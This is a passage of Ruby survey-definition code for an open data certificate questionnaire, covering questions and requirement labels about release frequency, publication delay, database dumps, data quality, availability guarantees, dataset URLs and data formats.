condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_seriesType, '==', :a_dumps
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'is available',
:requirement => ['exemplar_4']
label_exemplar_4 'You should <strong>provide a feed of changes to your data</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_4'
dependency :rule => 'A and B and C and D'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_seriesType, '==', :a_dumps
condition_D :q_changeFeed, '==', :a_false
q_frequentSeriesPublication 'How often do you create a new release?',
:discussion_topic => :frequentSeriesPublication,
:display_on_certificate => true,
:text_as_statement => 'New releases of this data are made',
:help_text => 'This determines how out of date this data becomes before people can get an update.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
a_rarely 'less than once a month',
:text_as_statement => 'less than once a month'
a_monthly 'at least every month',
:text_as_statement => 'at least every month',
:requirement => ['pilot_8']
a_weekly 'at least every week',
:text_as_statement => 'at least every week',
:requirement => ['standard_17']
a_daily 'at least every day',
:text_as_statement => 'at least every day',
:requirement => ['exemplar_5']
label_pilot_8 'You should <strong>create a new dataset release every month</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_8'
dependency :rule => 'A and B and (C and D and E)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_monthly
condition_D :q_frequentSeriesPublication, '!=', :a_weekly
condition_E :q_frequentSeriesPublication, '!=', :a_daily
label_standard_17 'You should <strong>create a new dataset release every week</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_17'
dependency :rule => 'A and B and (C and D)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_weekly
condition_D :q_frequentSeriesPublication, '!=', :a_daily
label_exemplar_5 'You should <strong>create a new dataset release every day</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_5'
dependency :rule => 'A and B and (C)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_daily
q_seriesPublicationDelay 'How long is the delay between when you create a dataset and when you publish it?',
:discussion_topic => :seriesPublicationDelay,
:display_on_certificate => true,
:text_as_statement => 'The lag between creation and publication of this data is',
:pick => :one
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_extreme 'longer than the gap between releases',
:text_as_statement => 'longer than the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes more than a day for it to be published.'
a_reasonable 'about the same as the gap between releases',
:text_as_statement => 'about the same as the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes about a day for it to be published.',
:requirement => ['pilot_9']
a_good 'less than half the gap between releases',
:text_as_statement => 'less than half the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes less than twelve hours for it to be published.',
:requirement => ['standard_18']
a_minimal 'there is minimal or no delay',
:text_as_statement => 'minimal',
:help_text => 'Choose this if you publish within a few seconds or a few minutes.',
:requirement => ['exemplar_6']
label_pilot_9 'You should <strong>have a reasonable delay between when you create and publish a dataset</strong> that is less than the gap between releases so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_9'
dependency :rule => 'A and (B and C and D)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_reasonable
condition_C :q_seriesPublicationDelay, '!=', :a_good
condition_D :q_seriesPublicationDelay, '!=', :a_minimal
label_standard_18 'You should <strong>have a short delay between when you create and publish a dataset</strong> that is less than half the gap between releases so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_18'
dependency :rule => 'A and (B and C)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_good
condition_C :q_seriesPublicationDelay, '!=', :a_minimal
label_exemplar_6 'You should <strong>have minimal or no delay between when you create and publish a dataset</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_6'
dependency :rule => 'A and (B)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_minimal
q_provideDumps 'Do you also publish dumps of this dataset?',
:discussion_topic => :provideDumps,
:display_on_certificate => true,
:text_as_statement => 'The curator publishes',
:help_text => 'A dump is an extract of the whole dataset into a file that people can download. This lets people do analysis that\'s different to analysis with API access.',
:pick => :one
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'dumps of the data',
:requirement => ['standard_19']
label_standard_19 'You should <strong>let people download your entire dataset</strong> so that they can do more complete and accurate analysis with all the data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_19'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_false
q_dumpFrequency 'How frequently do you create a new database dump?',
:discussion_topic => :dumpFrequency,
:display_on_certificate => true,
:text_as_statement => 'Database dumps are created',
:help_text => 'Faster access to more frequent extracts of the whole dataset means people can get started quicker with the most up-to-date data.',
:pick => :one
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
a_rarely 'less frequently than once a month',
:text_as_statement => 'less frequently than once a month'
a_monthly 'at least every month',
:text_as_statement => 'at least every month',
:requirement => ['pilot_10']
a_weekly 'within a week of any change',
:text_as_statement => 'within a week of any change',
:requirement => ['standard_20']
a_daily 'within a day of any change',
:text_as_statement => 'within a day of any change',
:requirement => ['exemplar_7']
label_pilot_10 'You should <strong>create a new database dump every month</strong> so that people have the latest data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_10'
dependency :rule => 'A and B and C and (D and E and F)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_monthly
condition_E :q_dumpFrequency, '!=', :a_weekly
condition_F :q_dumpFrequency, '!=', :a_daily
label_standard_20 'You should <strong>create a new database dump within a week of any change</strong> so that people have less time to wait for the latest data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_20'
dependency :rule => 'A and B and C and (D and E)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_weekly
condition_E :q_dumpFrequency, '!=', :a_daily
label_exemplar_7 'You should <strong>create a new database dump within a day of any change</strong> so that people find it easier to get the latest data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_7'
dependency :rule => 'A and B and C and (D)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_daily
q_corrected 'Will your data be corrected if it has errors?',
:discussion_topic => :corrected,
:display_on_certificate => true,
:text_as_statement => 'Any errors in this data are',
:help_text => 'It\'s good practice to fix errors in your data especially if you use it yourself. When you make corrections, people need to be told about them.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_timeSensitive, '!=', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'corrected',
:requirement => ['standard_21']
label_standard_21 'You should <strong>correct data when people report errors</strong> so everyone benefits from improvements in accuracy.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_21'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_timeSensitive, '!=', :a_true
condition_C :q_corrected, '==', :a_false
label_group_8 'Quality',
:help_text => 'how much people can rely on your data',
:customer_renderer => '/partials/fieldset'
q_qualityUrl 'Where do you document issues with the quality of this data?',
:discussion_topic => :qualityUrl,
:display_on_certificate => true,
:text_as_statement => 'Data quality is documented at',
:help_text => 'Give a URL where people can find out about the quality of your data. People accept that errors are inevitable, from equipment malfunctions or mistakes that happen in system migrations. You should be open about quality so people can judge how much to rely on this data.'
a_1 'Data Quality Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Data Quality Documentation URL',
:requirement => ['standard_22']
label_standard_22 'You should <strong>document any known issues with your data quality</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_22'
dependency :rule => 'A'
condition_A :q_qualityUrl, '==', {:string_value => '', :answer_reference => '1'}
q_qualityControlUrl 'Where is your quality control process described?',
:discussion_topic => :qualityControlUrl,
:display_on_certificate => true,
:text_as_statement => 'Quality control processes are described at',
:help_text => 'Give a URL for people to learn about ongoing checks on your data, either automatic or manual. This reassures them that you take quality seriously and encourages improvements that benefit everyone.'
a_1 'Quality Control Process Description URL',
:string,
:input_type => :url,
:placeholder => 'Quality Control Process Description URL',
:requirement => ['exemplar_8']
label_exemplar_8 'You should <strong>document your quality control process</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_8'
dependency :rule => 'A'
condition_A :q_qualityControlUrl, '==', {:string_value => '', :answer_reference => '1'}
label_group_9 'Guarantees',
:help_text => 'how much people can depend on your data’s availability',
:customer_renderer => '/partials/fieldset'
q_backups 'Do you take offsite backups?',
:discussion_topic => :backups,
:display_on_certificate => true,
:text_as_statement => 'The data is',
:help_text => 'Taking a regular offsite backup helps ensure that the data won\'t be lost in the case of accident.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'backed up offsite',
:requirement => ['standard_23']
label_standard_23 'You should <strong>take a result offsite backup</strong> so that the data won\'t be lost if an accident happens.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_23'
dependency :rule => 'A'
condition_A :q_backups, '==', :a_false
q_slaUrl 'Where do you describe any guarantees about service availability?',
:discussion_topic => :slaUrl,
:display_on_certificate => true,
:text_as_statement => 'Service availability is described at',
:help_text => 'Give a URL for a page that describes what guarantees you have about your service being available for people to use. For example you might have a guaranteed uptime of 99.5%, or you might provide no guarantees.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Service Availability Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Service Availability Documentation URL',
:requirement => ['standard_24']
label_standard_24 'You should <strong>describe what guarantees you have around service availability</strong> so that people know how much they can rely on it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_24'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_slaUrl, '==', {:string_value => '', :answer_reference => '1'}
q_statusUrl 'Where do you give information about the current status of the service?',
:discussion_topic => :statusUrl,
:display_on_certificate => true,
:text_as_statement => 'Service status is given at',
:help_text => 'Give a URL for a page that tells people about the current status of your service, including any faults you are aware of.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Service Status URL',
:string,
:input_type => :url,
:placeholder => 'Service Status URL',
:requirement => ['exemplar_9']
label_exemplar_9 'You should <strong>have a service status page</strong> that tells people about the current status of your service.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_9'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_statusUrl, '==', {:string_value => '', :answer_reference => '1'}
q_onGoingAvailability 'How long will this data be available for?',
:discussion_topic => :onGoingAvailability,
:display_on_certificate => true,
:text_as_statement => 'The data is available',
:pick => :one
a_experimental 'it might disappear at any time',
:text_as_statement => 'experimentally and might disappear at any time'
a_short 'it\'s available experimentally but should be around for another year or so',
:text_as_statement => 'experimentally for another year or so',
:requirement => ['pilot_11']
a_medium 'it\'s in your medium-term plans so should be around for a couple of years',
:text_as_statement => 'for at least a couple of years',
:requirement => ['standard_25']
a_long 'it\'s part of your day-to-day operations so will stay published for a long time',
:text_as_statement => 'for a long time',
:requirement => ['exemplar_10']
label_pilot_11 'You should <strong>guarantee that your data will be available in this form for at least a year</strong> so that people can decide how much to rely on your data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_11'
dependency :rule => 'A and B and C'
condition_A :q_onGoingAvailability, '!=', :a_short
condition_B :q_onGoingAvailability, '!=', :a_medium
condition_C :q_onGoingAvailability, '!=', :a_long
label_standard_25 'You should <strong>guarantee that your data will be available in this form in the medium-term</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_25'
dependency :rule => 'A and B'
condition_A :q_onGoingAvailability, '!=', :a_medium
condition_B :q_onGoingAvailability, '!=', :a_long
label_exemplar_10 'You should <strong>guarantee that your data will be available in this form in the long-term</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_10'
dependency :rule => 'A'
condition_A :q_onGoingAvailability, '!=', :a_long
end
section_technical 'Technical Information',
:description => 'Locations, formats and trust' do
label_group_11 'Locations',
:help_text => 'how people can access your data',
:customer_renderer => '/partials/fieldset'
q_datasetUrl 'Where is your dataset?',
:discussion_topic => :datasetUrl,
:display_on_certificate => true,
:text_as_statement => 'This data is published at',
:help_text => 'Give a URL to the dataset itself. Open data should be linked to directly on the web so people can easily find and reuse it.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_oneoff
a_1 'Dataset URL',
:string,
:input_type => :url,
:placeholder => 'Dataset URL',
:requirement => ['basic_9', 'pilot_12']
label_basic_9 'You must <strong>provide either a URL to your data or a URL to documentation</strong> about it so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_9'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_datasetUrl, '==', {:string_value => '', :answer_reference => '1'}
label_pilot_12 'You should <strong>have a URL that is a direct link to the data itself</strong> so that people can access it easily.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_12'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_datasetUrl, '==', {:string_value => '', :answer_reference => '1'}
q_versionManagement 'How do you publish a series of the same dataset?',
:discussion_topic => :versionManagement,
:requirement => ['basic_10'],
:pick => :any
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_current 'as a single URL that\'s regularly updated',
:help_text => 'Choose this if there\'s one URL for people to download the most recent version of the current dataset.',
:requirement => ['standard_26']
a_template 'as consistent URLs for each release',
:help_text => 'Choose this if your dataset URLs follow a regular pattern that includes the date of publication, for example, a URL that starts \'2013-04\'. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['pilot_13']
a_list 'as a list of releases',
:help_text => 'Choose this if you have a list of datasets on a web page or a feed (like Atom or RSS) with links to each individual release and its details. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['standard_27']
label_standard_26 'You should <strong>have a single persistent URL to download the current version of your data</strong> so that people can access it easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_26'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_current
label_pilot_13 'You should <strong>use a consistent pattern for different release URLs</strong> so that people can download each one automatically.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_13'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_template
label_standard_27 'You should <strong>have a document or feed with a list of available releases</strong> so people can create scripts to download them all.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_27'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_list
label_basic_10 'You must <strong>provide access to releases of your data through a URL</strong> that gives the current version, a discoverable series of URLs or through a documentation page so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_10'
dependency :rule => 'A and (B and C and D and E)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_versionManagement, '!=', :a_current
condition_D :q_versionManagement, '!=', :a_template
condition_E :q_versionManagement, '!=', :a_list
q_currentDatasetUrl 'Where is your current dataset?',
:discussion_topic => :currentDatasetUrl,
:display_on_certificate => true,
:text_as_statement => 'The current dataset is available at',
:help_text => 'Give a single URL to the most recent version of the dataset. The content at this URL should change each time a new version is released.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_current
a_1 'Current Dataset URL',
:string,
:input_type => :url,
:placeholder => 'Current Dataset URL',
:required => :required
q_versionsTemplateUrl 'What format do dataset release URLs follow?',
:discussion_topic => :versionsTemplateUrl,
:display_on_certificate => true,
:text_as_statement => 'Releases follow this consistent URL pattern',
:help_text => 'This is the structure of URLs when you publish different releases. Use `{variable}` to indicate parts of the template URL that change, for example, `http://example.com/data/monthly/mydata-{YY}{MM}.csv`',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_template
a_1 'Version Template URL',
:string,
:input_type => :text,
:placeholder => 'Version Template URL',
:required => :required
q_versionsUrl 'Where is your list of dataset releases?',
:discussion_topic => :versionsUrl,
:display_on_certificate => true,
:text_as_statement => 'Releases of this data are listed at',
:help_text => 'Give a URL to a page or feed with a machine-readable list of datasets. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_list
a_1 'Version List URL',
:string,
:input_type => :url,
:placeholder => 'Version List URL',
:required => :required
q_endpointUrl 'Where is the endpoint for your API?',
:discussion_topic => :endpointUrl,
:display_on_certificate => true,
:text_as_statement => 'The API service endpoint is',
:help_text => 'Give a URL that\'s a starting point for people\'s scripts to access your API. This should be a service description document that helps the script to work out which services exist.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Endpoint URL',
:string,
:input_type => :url,
:placeholder => 'Endpoint URL',
:requirement => ['basic_11', 'standard_28']
label_basic_11 'You must <strong>provide either an API endpoint URL or a URL to its documentation</strong> so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_11'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_endpointUrl, '==', {:string_value => '', :answer_reference => '1'}
label_standard_28 'You should <strong>have a service description document or single entry point for your API</strong> so that people can access it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_28'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_endpointUrl, '==', {:string_value => '', :answer_reference => '1'}
q_dumpManagement 'How do you publish database dumps?',
:discussion_topic => :dumpManagement,
:pick => :any
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
a_current 'as a single URL that\'s regularly updated',
:help_text => 'Choose this if there\'s one URL for people to download the most recent version of the current database dump.',
:requirement => ['standard_29']
a_template 'as consistent URLs for each release',
:help_text => 'Choose this if your database dump URLs follow a regular pattern that includes the date of publication, for example, a URL that starts \'2013-04\'. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['exemplar_11']
a_list 'as a list of releases',
:help_text => 'Choose this if you have a list of database dumps on a web page or a feed (such as Atom or RSS) with links to each individual release and its details. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['exemplar_12']
label_standard_29 'You should <strong>have a single persistent URL to download the current dump of your database</strong> so that people can find it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_29'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_current
label_exemplar_11 'You should <strong>use a consistent pattern for database dump URLs</strong> so that people can can download each one automatically.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_11'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_template
label_exemplar_12 'You should <strong>have a document or feed with a list of available database dumps</strong> so people can create scripts to download them all',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_12'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_list
q_currentDumpUrl 'Where is the current database dump?',
:discussion_topic => :currentDumpUrl,
:display_on_certificate => true,
:text_as_statement => 'The most recent database dump is always available at',
:help_text => 'Give a URL to the most recent dump of the database. The content at this URL should change each time a new database dump is created.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_current
a_1 'Current Dump URL',
:string,
:input_type => :url,
:placeholder => 'Current Dump URL',
:required => :required
q_dumpsTemplateUrl 'What format do database dump URLs follow?',
:discussion_topic => :dumpsTemplateUrl,
:display_on_certificate => true,
:text_as_statement => 'Database dumps follow the consistent URL pattern',
:help_text => 'This is the structure of URLs when you publish different releases. Use `{variable}` to indicate parts of the template URL that change, for example, `http://example.com/data/monthly/mydata-{YY}{MM}.csv`',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_template
a_1 'Dump Template URL',
:string,
:input_type => :text,
:placeholder => 'Dump Template URL',
:required => :required
q_dumpsUrl 'Where is your list of available database dumps?',
:discussion_topic => :dumpsUrl,
:display_on_certificate => true,
:text_as_statement => 'A list of database dumps is at',
:help_text => 'Give a URL to a page or feed with a machine-readable list of database dumps. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_list
a_1 'Dump List URL',
:string,
:input_type => :url,
:placeholder => 'Dump List URL',
:required => :required
q_changeFeedUrl 'Where is your feed of changes?',
:discussion_topic => :changeFeedUrl,
:display_on_certificate => true,
:text_as_statement => 'A feed of changes to this data is at',
:help_text => 'Give a URL to a page or feed that provides a machine-readable list of the previous versions of the database dumps. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A'
condition_A :q_changeFeed, '==', :a_true
a_1 'Change Feed URL',
:string,
:input_type => :url,
:placeholder => 'Change Feed URL',
:required => :required
label_group_12 'Formats',
:help_text => 'how people can work with your data',
:customer_renderer => '/partials/fieldset'
q_machineReadable 'Is this data machine-readable?',
:discussion_topic => :machineReadable,
:display_on_certificate => true,
:text_as_statement => 'This data is',
:help_text => 'People prefer data formats which are easily processed by a computer, for speed and accuracy. For example, a scanned photocopy of a spreadsheet would not be machine-readable but a CSV file would be.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable',
:requirement => ['pilot_14']
label_pilot_14 'You should <strong>provide your data in a machine-readable format</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_14'
dependency :rule => 'A'
condition_A :q_machineReadable, '==', :a_false
q_openStandard 'Is this data in a standard open format?',
:discussion_topic => :openStandard,
:display_on_certificate => true,
:text_as_statement => 'The format of this data is',
:help_text => 'Open standards are created through a fair, transparent and collaborative process. Anyone can implement them and there’s lots of support so it’s easier for you to share data with more people. For example, XML, CSV and JSON are open standards.',
:help_text_more_url => 'https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/183962/Open-Standards-Principles-FINAL.pdf',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'a standard open format',
:requirement => ['standard_30']
label_standard_30 'You should <strong>provide your data in an open standard format</strong> so that people can use widely available tools to process it more easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_30'
dependency :rule => 'A'
condition_A :q_openStandard, '==', :a_false
q_dataType 'What kind of data do you publish?',
:discussion_topic => :dataType,
:pick => :any
a_documents 'human-readable documents',
:help_text => 'Choose this if your data is meant for human consumption. For example; policy documents, white papers, reports and meeting minutes. These usually have some structure to them but are mostly text.'
a_statistical 'statistical data like counts, averages and percentages',
:help_text => 'Choose this if your data is statistical or numeric data like counts, averages or percentages. Like census results, traffic flow information or crime statistics for example.'
a_geographic 'geographic information, such as points and boundaries',
:help_text => 'Choose this if your data can be plotted on a map as points, boundaries or lines.'
a_structured 'other kinds of structured data',
:help_text => 'Choose this if your data is structured in other ways. Like event details, railway timetables, contact information or anything that can be interpreted as data, and analysed and presented in multiple ways.'
q_documentFormat 'Do your human-readable documents include formats that',
:discussion_topic => :documentFormat,
:display_on_certificate => true,
:text_as_statement => 'Documents are published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_documents
a_semantic 'describe semantic structure like HTML, Docbook or Markdown',
:text_as_statement => 'in a semantic format',
:help_text => 'These formats label structures like chapters, headings and tables that make it easy to automatically create summaries like tables of contents and glossaries. They also make it easy to apply different styles to the document so its appearance changes.',
:requirement => ['standard_31']
a_format 'describe information on formatting like OOXML or PDF',
:text_as_statement => 'in a display format',
:help_text => 'These formats emphasise appearance like fonts, colours and positioning of different elements within the page. These are good for human consumption, but aren\'t as easy for people to process automatically and change style.',
:requirement => ['pilot_15']
a_unsuitable 'aren\'t meant for documents like Excel, JSON or CSV',
:text_as_statement => 'in a format unsuitable for documents',
:help_text => 'These formats better suit tabular or structured data.'
label_standard_31 'You should <strong>publish documents in a format that exposes semantic structure</strong> so that people can display them in different styles.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_31'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_documents
condition_B :q_documentFormat, '!=', :a_semantic
label_pilot_15 'You should <strong>publish documents in a format designed specifically for them</strong> so that they\'re easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_15'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_documents
condition_B :q_documentFormat, '!=', :a_semantic
condition_C :q_documentFormat, '!=', :a_format
q_statisticalFormat 'Does your statistical data include formats that',
:discussion_topic => :statisticalFormat,
:display_on_certificate => true,
:text_as_statement => 'Statistical data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_statistical
a_statistical 'expose the structure of statistical hypercube data like <a href="http://sdmx.org/">SDMX</a> or <a href="http://www.w3.org/TR/vocab-data-cube/">Data Cube</a>',
:text_as_statement => 'in a statistical data format',
:help_text => 'Individual observations in hypercubes relate to a particular measure and a set of dimensions. Each observation may also be related to annotations that give extra context. Formats like <a href="http://sdmx.org/">SDMX</a> and <a href="http://www.w3.org/TR/vocab-data-cube/">Data Cube</a> are designed to express this underlying structure.',
:requirement => ['exemplar_13']
a_tabular 'treat statistical data as a table like CSV',
:text_as_statement => 'in a tabular data format',
:help_text => 'These formats arrange statistical data within a table of rows and columns. This lacks extra context about the underlying hypercube but is easy to process.',
:requirement => ['standard_32']
a_format 'focus on the format of tabular data like Excel',
:text_as_statement => 'in a presentation format',
:help_text => 'Spreadsheets use formatting like italic or bold text, and indentation within fields to describe its appearance and underlying structure. This styling helps people to understand the meaning of your data but makes it less suitable for computers to process.',
:requirement => ['pilot_16']
a_unsuitable 'aren\'t meant for statistical or tabular data like Word or PDF',
:text_as_statement => 'in a format unsuitable for statistical data',
:help_text => 'These formats don\'t suit statistical data because they obscure the underlying structure of the data.'
label_exemplar_13 'You should <strong>publish statistical data in a format that exposes dimensions and measures</strong> so that it\'s easy to analyse.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_13'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
label_standard_32 'You should <strong>publish tabular data in a format that exposes tables of data</strong> so that it\'s easy to analyse.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_32'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
condition_C :q_statisticalFormat, '!=', :a_tabular
label_pilot_16 'You should <strong>publish tabular data in a format designed for that purpose</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_16'
dependency :rule => 'A and (B and C and D)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
condition_C :q_statisticalFormat, '!=', :a_tabular
condition_D :q_statisticalFormat, '!=', :a_format
q_geographicFormat 'Does your geographic data include formats that',
:discussion_topic => :geographicFormat,
:display_on_certificate => true,
:text_as_statement => 'Geographic data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_geographic
a_specific 'are designed for geographic data like <a href="http://www.opengeospatial.org/standards/kml/">KML</a> or <a href="http://www.geojson.org/">GeoJSON</a>',
:text_as_statement => 'in a geographic data format',
:help_text => 'These formats describe points, lines and boundaries, and expose structures in the data which make it easier to process automatically.',
